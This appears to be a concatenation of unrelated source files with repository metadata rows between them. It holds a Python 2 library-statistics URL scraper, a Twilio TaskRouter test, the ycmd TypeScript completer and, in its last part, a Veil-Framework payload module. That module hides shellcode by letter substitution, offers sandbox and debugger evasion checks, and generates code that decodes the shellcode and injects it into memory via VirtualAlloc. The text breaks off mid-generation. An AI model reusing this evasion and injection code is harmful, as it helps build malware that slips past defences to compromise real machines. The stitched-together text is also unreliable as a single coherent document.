# an individual URL. This procedure is followed here, with the URLs given in the list of tuples "urlList".
#
# The result will be saved as a csv file for each database request to the cwd (i.e. current working directory).<sup>(5)</sup>
# Furthermore, those libraries without a valid url will be printed out (in a JSON prettyprint style).
#
# ---
#
# <sup>(1)</sup> In DBS National Libraries, there are actually four libraries listed, but one is inactive.
#
# <sup>(2)</sup> In DBS Section 4: University Libraries, there are actually 84 libraries listed, but one is inactive.
#
# <sup>(3)</sup> Two libraries were added manually to this goup of libraries: The Hamburger Bücherhallen, whose entry in DBS omitted the DBV Section, and the Zentral- und Landesbibliothek Berlin, which was listed as member of Section 4 "Wissenschaftliche Universalbibliotheken", though the library is member of Section 1 (and only guest member of Section 4 according to the DBV webpage (http://www.bibliotheksverband.de/mitglieder/).
#
# <sup>(4)</sup> From DBS Section 2, two libraries (KA119 and KA129) were removed: These are small "ehrenamtlich geführte" libraries (less than 1,000 books) without any presence on the internet.
# For two more libraries (MB026 and GY440) the urls, missing in the DBS, were added manually.
#
# <sup>(5)</sup> To find out, what your cwd is, type:
#
# >```import os
# >print os.getcwd()```
#
# ---
#
# Data was collected: 2014-02-08
#
# List of URLs
#
# List of tuples of name & url
# urlList[0] = Nr. 1 (DBS National Libraries)
# urlList[1] = Nr. 2 (DBS Section 4, University Libraries)
# urlList[2] = Nr. 3 (DBS Section 1)
# urlList[3] = Nr. 4 (DBS Section 2)
urlList = [('DBS_NatBib', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AG012|AG292|AG000|AK001'),
('DBS_4_UB', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=EM482|AH715|EJ882|EX035|AA708|AG188|DB900|DE081|AD011|DB079|AF093|AH090|AA289|MM201|AF007|EL283|AJ082|AB294|AD291|AE088|AX001|AA046|AC018|AB105|AA083|EL131|AE830|AL091|AE027|BK213|AX566|AL352|AK517|EX461|AL005|AL017|AG061|AC006|AE003|AB038|AK384|AD473|AH703|AB361|AD084|AK104|AF020|AA290|DE100|SB005|AL029|AK025|AB026|AA009|AH089|AH016|AN087|AJ100|EL039|AC030|AE386|AA034|AJ008|BD987|AE015|BD296|AH077|AE180|AH004|AF019|AK700|AH466|AH739|AJ355|AH028|AL467|AB385|AJ021|BZ398|AC468|DC072|DA385|BE926|FH880'),
('DBS_1', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AJ197|GE486|AA381|AE131|AH478|AJ136|AE064|AK062|AG115|AB075|AJ380|AL480|AH132|AA277|AE362|AE106'),
('DBS_2', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AF111|MB026|GB291|AH259|GC556|KA119|KA129|GD895|AJ367|AF238|AD242|AD072|AG243|GY440|AA186|AB063|AH181|AD369|AC134|AF135|GE231|KS124|AL285|AF196|KQ152|AK116|AG279|AE295|AD217|GD822|AK153|GM675|AG267|AK293|AC286|AB178|AF275|AJ033|AL157|AC122|AJ471|WB861|LD510|GC283|AD059|MB038|AA174|AG371|AG231|LC499|LC505|AJ069|AG073|GB850|WB782|MB014|AH260|AH168|GC301|AJ264|GD998|GE012|GE036|MB002|GD767|AD163|AH351|AC262|GA444|GE462|GB746|AA472|GE899|AH247|AA447|AB270|GE164|GA596|AH284|AF470|AB142|AD229|JA868')]
#
# Functions
#
from bs4 import BeautifulSoup
import urllib2
import json
import csv
def writeDict(bsString):
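    # Illustrative input/output (the entry shown here is hypothetical):
    #   "Berlin Staatsbibliothek (DBS-ID: AG012, Sig. 1a)" ->
    #   {'DBS-ID': 'AG012', 'Name': 'Berlin Staatsbibliothek', 'Ort': 'Berlin', 'Twitter': ''}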
s = bsString.lstrip() # stripping off leading whitespace
i1 = s.find("(DBS-ID: ")
i2 = i1 + len("(DBS-ID: ")
i3 = s.find(", Sig.") # if there is no Sig. given, i3 returns -1 [i.e. the closing paren ")"]
name = s[:i1-1]
i4 = name.find(' ') # to get the place, split name at first white space
dbsID = s[i2:i3]
place = name[:i4]
dic = {}
dic['DBS-ID'] = dbsID.encode("utf-8") # BeautifulSoup encodes in Unicode,
dic['Name'] = name.encode("utf-8") # which is not supported by csv;
dic['Ort'] = place.encode("utf-8") # hence encoding to utf-8 is necessary
dic['Twitter'] = ''
return dic
def findURL(soupTAG):
urlTAG = soupTAG.find_next("a")
url = urlTAG.get('href')
d = {}
d['URL'] = url.encode("utf-8")
return d
def parseHTML(soupHTML):
l = []
loD = []
s0 = soupHTML.table.table.h3
while type(s0) != type(None): # first write each entry which is not NoneType to a list
l.append(s0)
s_next = s0.find_next("h3")
s0 = s_next
for i in l:
url = findURL(i) # finding the next url for each entry
si = i.string # second write each string of the list which is not NoneType
if type(si) != type(None): # to a List of Dictionaries
di = writeDict(si)
di.update(url) # adding the url to the dict
loD.append(di)
else:
pass
return loD
def libCSV(index_of_urlList):
'''
pass as argument the index number of the urlList
prints out
(1.) Nr. of (active) libraries in the list
(2.) A JSON prettyprint list of libraries without a valid url
(3.) The name of the csv file.
Saves the csv file in the cwd.
'''
tup = urlList[index_of_urlList]
u = tup[1]
web = urllib2.urlopen(u)
webHTML = web.read()
web.close()
soup = BeautifulSoup(webHTML)
result = parseHTML(soup)
print 'For', tup[0], len(result), '(active) libraries could be found.'
for i in result:
if i["URL"] == "":
print 'For this library no URL could be found: \n'
print json.dumps(i, indent=1), '\n'
filename = tup[0] + '.csv'
    l1 = len(filename) + len('The csv will be saved as ')
    print "\n"+ l1*"=" + "\n"
    print 'The csv will be saved as', filename
return exp2CSV(result, filename)
def exp2CSV(listOfDict, filename):
'''
arguments = list of dictionaries, filename
output = saves file to cwd (current working directory)
'''
outputfile = filename
keyz = listOfDict[0].keys()
f = open(outputfile,'w')
dict_writer = csv.DictWriter(f,keyz)
dict_writer.writer.writerow(keyz)
dict_writer.writerows(listOfDict)
f.close()
| mit | 6,047,267,657,044,713,000 | 43.239264 | 611 | 0.675912 | false |
tysonholub/twilio-python | tests/integration/taskrouter/v1/workspace/worker/test_worker_statistics.py | 1 | 3649 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class WorkerStatisticsTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://taskrouter.twilio.com/v1/Workspaces/WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Workers/WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Statistics',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"cumulative": {
"reservations_created": 100,
"reservations_accepted": 100,
"reservations_rejected": 100,
"reservations_timed_out": 100,
"reservations_canceled": 100,
"reservations_rescinded": 100,
"activity_durations": [
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Offline",
"avg": 1080,
"total": 5400
},
{
"max": 0,
"min": 900,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Busy",
"avg": 1012,
"total": 8100
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Idle",
"avg": 0,
"total": 0
},
{
"max": 0,
"min": 0,
"sid": "WAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Reserved",
"avg": 0,
"total": 0
}
],
"start_time": "2008-01-02T00:00:00Z",
"end_time": "2008-01-02T00:00:00Z"
},
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"workspace_sid": "WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"worker_sid": "WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"url": "https://taskrouter.twilio.com/v1/Workspaces/WSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Workers/WKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Statistics"
}
'''
))
actual = self.client.taskrouter.v1.workspaces(sid="WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.workers(sid="WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.statistics().fetch()
self.assertIsNotNone(actual)
| mit | -9,054,563,449,457,598,000 | 39.098901 | 157 | 0.435462 | false |
mispencer/ycmd | ycmd/completers/typescript/typescript_completer.py | 1 | 22168 | # Copyright (C) 2015 - 2016 Google Inc.
# 2016 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import * # noqa
import json
import logging
import os
import re
import subprocess
import itertools
import threading
from tempfile import NamedTemporaryFile
from ycmd import responses
from ycmd import utils
from ycmd.completers.completer import Completer
from ycmd.completers.completer_utils import GetFileContents
BINARY_NOT_FOUND_MESSAGE = ( 'TSServer not found. '
'TypeScript 1.5 or higher is required.' )
SERVER_NOT_RUNNING_MESSAGE = 'TSServer is not running.'
MAX_DETAILED_COMPLETIONS = 100
RESPONSE_TIMEOUT_SECONDS = 10
PATH_TO_TSSERVER = utils.FindExecutable( 'tsserver' )
LOGFILE_FORMAT = 'tsserver_'
_logger = logging.getLogger( __name__ )
class DeferredResponse( object ):
"""
A deferred that resolves to a response from TSServer.
"""
def __init__( self, timeout = RESPONSE_TIMEOUT_SECONDS ):
self._event = threading.Event()
self._message = None
self._timeout = timeout
def resolve( self, message ):
self._message = message
self._event.set()
def result( self ):
self._event.wait( timeout = self._timeout )
if not self._event.isSet():
raise RuntimeError( 'Response Timeout' )
message = self._message
if not message[ 'success' ]:
raise RuntimeError( message[ 'message' ] )
if 'body' in message:
return self._message[ 'body' ]
def ShouldEnableTypescriptCompleter():
if not PATH_TO_TSSERVER:
_logger.error( BINARY_NOT_FOUND_MESSAGE )
return False
_logger.info( 'Using TSServer located at {0}'.format( PATH_TO_TSSERVER ) )
return True
class TypeScriptCompleter( Completer ):
"""
Completer for TypeScript.
It uses TSServer which is bundled with TypeScript 1.5
See the protocol here:
https://github.com/Microsoft/TypeScript/blob/2cb0dfd99dc2896958b75e44303d8a7a32e5dc33/src/server/protocol.d.ts
"""
def __init__( self, user_options ):
super( TypeScriptCompleter, self ).__init__( user_options )
self._logfile = None
self._tsserver_handle = None
# Used to prevent threads from concurrently writing to
# the tsserver process' stdin
self._write_lock = threading.Lock()
# Each request sent to tsserver must have a sequence id.
# Responses contain the id sent in the corresponding request.
self._sequenceid = itertools.count()
# Used to prevent threads from concurrently accessing the sequence counter
self._sequenceid_lock = threading.Lock()
self._server_lock = threading.RLock()
# Used to read response only if TSServer is running.
self._tsserver_is_running = threading.Event()
# Start a thread to read response from TSServer.
self._thread = threading.Thread( target = self._ReaderLoop, args = () )
self._thread.daemon = True
self._thread.start()
self._StartServer()
# Used to map sequence id's to their corresponding DeferredResponse
# objects. The reader loop uses this to hand out responses.
self._pending = {}
# Used to prevent threads from concurrently reading and writing to
# the pending response dictionary
self._pending_lock = threading.Lock()
_logger.info( 'Enabling typescript completion' )
def _StartServer( self ):
with self._server_lock:
if self._ServerIsRunning():
return
self._logfile = utils.CreateLogfile( LOGFILE_FORMAT )
tsserver_log = '-file {path} -level {level}'.format( path = self._logfile,
level = _LogLevel() )
# TSServer gets the configuration for the log file through the
# environment variable 'TSS_LOG'. This seems to be undocumented but
# looking at the source code it seems like this is the way:
# https://github.com/Microsoft/TypeScript/blob/8a93b489454fdcbdf544edef05f73a913449be1d/src/server/server.ts#L136
environ = os.environ.copy()
utils.SetEnviron( environ, 'TSS_LOG', tsserver_log )
_logger.info( 'TSServer log file: {0}'.format( self._logfile ) )
# We need to redirect the error stream to the output one on Windows.
self._tsserver_handle = utils.SafePopen( PATH_TO_TSSERVER,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.STDOUT,
env = environ )
self._tsserver_is_running.set()
def _ReaderLoop( self ):
"""
Read responses from TSServer and use them to resolve
the DeferredResponse instances.
"""
while True:
self._tsserver_is_running.wait()
try:
message = self._ReadMessage()
except RuntimeError:
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
self._tsserver_is_running.clear()
continue
# We ignore events for now since we don't have a use for them.
msgtype = message[ 'type' ]
if msgtype == 'event':
eventname = message[ 'event' ]
_logger.info( 'Received {0} event from tsserver'.format( eventname ) )
continue
if msgtype != 'response':
_logger.error( 'Unsupported message type {0}'.format( msgtype ) )
continue
seq = message[ 'request_seq' ]
with self._pending_lock:
if seq in self._pending:
self._pending[ seq ].resolve( message )
del self._pending[ seq ]
def _ReadMessage( self ):
"""Read a response message from TSServer."""
# The headers are pretty similar to HTTP.
# At the time of writing, 'Content-Length' is the only supplied header.
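    # Illustrative frame (the payload shown here is made up):
    #   Content-Length: 60\r\n
    #   \r\n
    #   {"seq":0,"type":"response","command":"exit","success":true}\n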
headers = {}
while True:
headerline = self._tsserver_handle.stdout.readline().strip()
if not headerline:
break
key, value = utils.ToUnicode( headerline ).split( ':', 1 )
headers[ key.strip() ] = value.strip()
# The response message is a JSON object which comes back on one line.
# Since this might change in the future, we use the 'Content-Length'
# header.
if 'Content-Length' not in headers:
raise RuntimeError( "Missing 'Content-Length' header" )
contentlength = int( headers[ 'Content-Length' ] )
# TSServer adds a newline at the end of the response message and counts it
# as one character (\n) towards the content length. However, newlines are
# two characters on Windows (\r\n), so we need to take care of that. See
# issue https://github.com/Microsoft/TypeScript/issues/3403
content = self._tsserver_handle.stdout.read( contentlength )
if utils.OnWindows() and content.endswith( b'\r' ):
content += self._tsserver_handle.stdout.read( 1 )
return json.loads( utils.ToUnicode( content ) )
def _BuildRequest( self, command, arguments = None ):
"""Build TSServer request object."""
with self._sequenceid_lock:
seq = next( self._sequenceid )
request = {
'seq': seq,
'type': 'request',
'command': command
}
if arguments:
request[ 'arguments' ] = arguments
return request
def _WriteRequest( self, request ):
"""Write a request to TSServer stdin."""
serialized_request = utils.ToBytes( json.dumps( request ) + '\n' )
with self._write_lock:
try:
self._tsserver_handle.stdin.write( serialized_request )
self._tsserver_handle.stdin.flush()
# IOError is an alias of OSError in Python 3.
except ( AttributeError, IOError ):
_logger.exception( SERVER_NOT_RUNNING_MESSAGE )
raise RuntimeError( SERVER_NOT_RUNNING_MESSAGE )
def _SendCommand( self, command, arguments = None ):
"""
Send a request message to TSServer but don't wait for the response.
This function is to be used when we don't care about the response
to the message that is sent.
"""
request = self._BuildRequest( command, arguments )
self._WriteRequest( request )
def _SendRequest( self, command, arguments = None ):
"""
Send a request message to TSServer and wait
for the response.
"""
request = self._BuildRequest( command, arguments )
deferred = DeferredResponse()
with self._pending_lock:
seq = request[ 'seq' ]
self._pending[ seq ] = deferred
self._WriteRequest( request )
return deferred.result()
def _Reload( self, request_data ):
"""
    Synchronize TSServer's view of the file to
the contents of the unsaved buffer.
"""
filename = request_data[ 'filepath' ]
contents = request_data[ 'file_data' ][ filename ][ 'contents' ]
tmpfile = NamedTemporaryFile( delete = False )
tmpfile.write( utils.ToBytes( contents ) )
tmpfile.close()
self._SendRequest( 'reload', {
'file': filename,
'tmpfile': tmpfile.name
} )
utils.RemoveIfExists( tmpfile.name )
def _ServerIsRunning( self ):
with self._server_lock:
return utils.ProcessIsRunning( self._tsserver_handle )
def ServerIsHealthy( self ):
return self._ServerIsRunning()
def SupportedFiletypes( self ):
return [ 'typescript' ]
def ComputeCandidatesInner( self, request_data ):
self._Reload( request_data )
entries = self._SendRequest( 'completions', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ]
} )
# A less detailed version of the completion data is returned
# if there are too many entries. This improves responsiveness.
if len( entries ) > MAX_DETAILED_COMPLETIONS:
return [ _ConvertCompletionData(e) for e in entries ]
names = []
namelength = 0
for e in entries:
name = e[ 'name' ]
namelength = max( namelength, len( name ) )
names.append( name )
detailed_entries = self._SendRequest( 'completionEntryDetails', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'start_codepoint' ],
'entryNames': names
} )
return [ _ConvertDetailedCompletionData( e, namelength )
for e in detailed_entries ]
def GetSubcommandsMap( self ):
return {
'RestartServer' : ( lambda self, request_data, args:
self._RestartServer( request_data ) ),
'StopServer' : ( lambda self, request_data, args:
self._StopServer() ),
'GoToDefinition' : ( lambda self, request_data, args:
self._GoToDefinition( request_data ) ),
'GoToReferences' : ( lambda self, request_data, args:
self._GoToReferences( request_data ) ),
'GoToType' : ( lambda self, request_data, args:
self._GoToType( request_data ) ),
'GetType' : ( lambda self, request_data, args:
self._GetType( request_data ) ),
'GetDoc' : ( lambda self, request_data, args:
self._GetDoc( request_data ) ),
'RefactorRename' : ( lambda self, request_data, args:
self._RefactorRename( request_data, args ) ),
}
def OnBufferVisit( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'open', { 'file': filename } )
def OnBufferUnload( self, request_data ):
filename = request_data[ 'filepath' ]
self._SendCommand( 'close', { 'file': filename } )
def OnFileReadyToParse( self, request_data ):
self._Reload( request_data )
def _GoToDefinition( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'definition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
span[ 'file' ] ) ),
span[ 'file' ],
span[ 'start' ][ 'line' ],
span[ 'start' ][ 'offset' ] ) )
except RuntimeError:
raise RuntimeError( 'Could not find definition' )
def _GoToReferences( self, request_data ):
self._Reload( request_data )
response = self._SendRequest( 'references', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return [
responses.BuildGoToResponseFromLocation(
_BuildLocation( utils.SplitLines( GetFileContents( request_data,
ref[ 'file' ] ) ),
ref[ 'file' ],
ref[ 'start' ][ 'line' ],
ref[ 'start' ][ 'offset' ] ),
ref[ 'lineText' ] )
for ref in response[ 'refs' ]
]
def _GoToType( self, request_data ):
self._Reload( request_data )
try:
filespans = self._SendRequest( 'typeDefinition', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_num' ]
} )
span = filespans[ 0 ]
return responses.BuildGoToResponse(
filepath = span[ 'file' ],
line_num = span[ 'start' ][ 'line' ],
column_num = span[ 'start' ][ 'offset' ]
)
except RuntimeError:
raise RuntimeError( 'Could not find type definition' )
def _GetType( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
return responses.BuildDisplayMessageResponse( info[ 'displayString' ] )
def _GetDoc( self, request_data ):
self._Reload( request_data )
info = self._SendRequest( 'quickinfo', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ]
} )
message = '{0}\n\n{1}'.format( info[ 'displayString' ],
info[ 'documentation' ] )
return responses.BuildDetailedInfoResponse( message )
def _RefactorRename( self, request_data, args ):
if len( args ) != 1:
raise ValueError( 'Please specify a new name to rename it to.\n'
'Usage: RefactorRename <new name>' )
self._Reload( request_data )
response = self._SendRequest( 'rename', {
'file': request_data[ 'filepath' ],
'line': request_data[ 'line_num' ],
'offset': request_data[ 'column_codepoint' ],
'findInComments': False,
'findInStrings': False,
} )
if not response[ 'info' ][ 'canRename' ]:
raise RuntimeError( 'Value cannot be renamed: {0}'.format(
response[ 'info' ][ 'localizedErrorMessage' ] ) )
# The format of the response is:
#
# body {
# info {
# ...
# triggerSpan: {
# length: original_length
# }
# }
#
# locs [ {
# file: file_path
# locs: [
# start: {
# line: line_num
# offset: offset
# }
# end {
# line: line_num
# offset: offset
# }
# ] }
# ]
# }
#
new_name = args[ 0 ]
location = responses.Location( request_data[ 'line_num' ],
request_data[ 'column_num' ],
request_data[ 'filepath' ] )
chunks = []
for file_replacement in response[ 'locs' ]:
chunks.extend( _BuildFixItChunksForFile( request_data,
new_name,
file_replacement ) )
return responses.BuildFixItResponse( [
responses.FixIt( location, chunks )
] )
def _RestartServer( self, request_data ):
with self._server_lock:
self._StopServer()
self._StartServer()
# This is needed because after we restart the TSServer it would lose all
# the information about the files we were working on. This means that the
# newly started TSServer will know nothing about the buffer we're working
# on after restarting the server. So if we restart the server and right
# after that ask for completion in the buffer, the server will timeout.
# So we notify the server that we're working on the current buffer.
self.OnBufferVisit( request_data )
def _StopServer( self ):
with self._server_lock:
if self._ServerIsRunning():
_logger.info( 'Stopping TSServer with PID {0}'.format(
self._tsserver_handle.pid ) )
self._SendCommand( 'exit' )
try:
utils.WaitUntilProcessIsTerminated( self._tsserver_handle,
timeout = 5 )
_logger.info( 'TSServer stopped' )
except RuntimeError:
_logger.exception( 'Error while stopping TSServer' )
self._CleanUp()
def _CleanUp( self ):
utils.CloseStandardStreams( self._tsserver_handle )
self._tsserver_handle = None
if not self.user_options[ 'server_keep_logfiles' ]:
utils.RemoveIfExists( self._logfile )
self._logfile = None
def Shutdown( self ):
self._StopServer()
def DebugInfo( self, request_data ):
with self._server_lock:
if self._ServerIsRunning():
return ( 'TypeScript completer debug information:\n'
' TSServer running\n'
' TSServer process ID: {0}\n'
' TSServer executable: {1}\n'
' TSServer logfile: {2}'.format( self._tsserver_handle.pid,
PATH_TO_TSSERVER,
self._logfile ) )
if self._logfile:
return ( 'TypeScript completer debug information:\n'
' TSServer no longer running\n'
' TSServer executable: {0}\n'
' TSServer logfile: {1}'.format( PATH_TO_TSSERVER,
self._logfile ) )
return ( 'TypeScript completer debug information:\n'
' TSServer is not running\n'
' TSServer executable: {0}'.format( PATH_TO_TSSERVER ) )
def _LogLevel():
return 'verbose' if _logger.isEnabledFor( logging.DEBUG ) else 'normal'
def _ConvertCompletionData( completion_data ):
return responses.BuildCompletionData(
insertion_text = completion_data[ 'name' ],
menu_text = completion_data[ 'name' ],
kind = completion_data[ 'kind' ],
extra_data = completion_data[ 'kind' ]
)
def _ConvertDetailedCompletionData( completion_data, padding = 0 ):
name = completion_data[ 'name' ]
display_parts = completion_data[ 'displayParts' ]
signature = ''.join( [ p[ 'text' ] for p in display_parts ] )
# needed to strip new lines and indentation from the signature
  signature = re.sub( r'\s+', ' ', signature )
menu_text = '{0} {1}'.format( name.ljust( padding ), signature )
return responses.BuildCompletionData(
insertion_text = name,
menu_text = menu_text,
kind = completion_data[ 'kind' ]
)
def _BuildFixItChunkForRange( new_name,
file_contents,
file_name,
source_range ):
""" returns list FixItChunk for a tsserver source range """
return responses.FixItChunk(
new_name,
responses.Range(
start = _BuildLocation( file_contents,
file_name,
source_range[ 'start' ][ 'line' ],
source_range[ 'start' ][ 'offset' ] ),
end = _BuildLocation( file_contents,
file_name,
source_range[ 'end' ][ 'line' ],
source_range[ 'end' ][ 'offset' ] ) ) )
def _BuildFixItChunksForFile( request_data, new_name, file_replacement ):
""" returns a list of FixItChunk for each replacement range for the
supplied file"""
# On windows, tsserver annoyingly returns file path as C:/blah/blah,
# whereas all other paths in Python are of the C:\\blah\\blah form. We use
# normpath to have python do the conversion for us.
file_path = os.path.normpath( file_replacement[ 'file' ] )
file_contents = utils.SplitLines( GetFileContents( request_data, file_path ) )
return [ _BuildFixItChunkForRange( new_name, file_contents, file_path, r )
for r in file_replacement[ 'locs' ] ]
def _BuildLocation( file_contents, filename, line, offset ):
return responses.Location(
line = line,
# tsserver returns codepoint offsets, but we need byte offsets, so we must
# convert
column = utils.CodepointOffsetToByteOffset( file_contents[ line - 1 ],
offset ),
filename = filename )
| gpl-3.0 | -6,037,105,945,986,100,000 | 32.844275 | 119 | 0.597483 | false |
Veil-Framework/Veil | tools/evasion/payloads/python/shellcode_inject/letter_substitution.py | 1 | 9106 | """
Currently, this code takes normal shellcode and replaces a hex character
with a random non-hex letter. At runtime,
the executable reverses the letter substitution and executes the shellcode
Letter substitution code was adapted from:
http://www.tutorialspoint.com/python/string_maketrans.htm
Module built by @christruncer
Contributed to by @EdvardHolst
"""
import random
import string
from datetime import date
from datetime import timedelta
from tools.evasion.evasion_common import encryption
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import gamemaker
from tools.evasion.evasion_common import shellcode_help
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "A letter used in shellcode is replaced with a different letter. At runtime, the exe reverses the letter substitution and executes the shellcode"
self.language = "python"
self.rating = "Excellent"
self.extension = "py"
self.hex_letters = "abcdefx"
self.non_hex_letters = "ghijklmnopqrstuvwyz"
self.name = "Python Letter Substitution"
self.path = "python/shellcode_inject/letter_substitution"
self.shellcode = shellcode_help.Shellcode(cli_obj)
self.cli_opts = cli_obj
self.payload_source_code = ""
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
self.cli_shellcode = False
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, or Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days"],
"HOSTNAME" : ["X", "Optional: Required system hostname"],
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"CLICKTRACK" : ["X", "Optional: Minimum number of clicks to execute payload"],
"UTCCHECK" : ["FALSE", "Optional: Validates system does not use UTC timezone"],
"VIRTUALFILES" : ["FALSE", "Optional: Check if VM supporting files exist"],
"VIRTUALDLLS" : ["FALSE", "Check for dlls loaded in memory"],
"CURSORMOVEMENT" : ["FALSE", "Check if cursor is in same position after 30 seconds"],
"USERPROMPT" : ["FALSE", "Make user click prompt prior to execution"],
"MINRAM" : ["FALSE", "Check for at least 3 gigs of RAM"],
"SANDBOXPROCESS" : ["FALSE", "Check for common sandbox processes"],
"DETECTDEBUG" : ["FALSE", "Check if debugger is present"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}
def generate(self):
        # Random letter substitution variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace('\\\\', '\\') +'\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ subbed_shellcode_variable_name +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
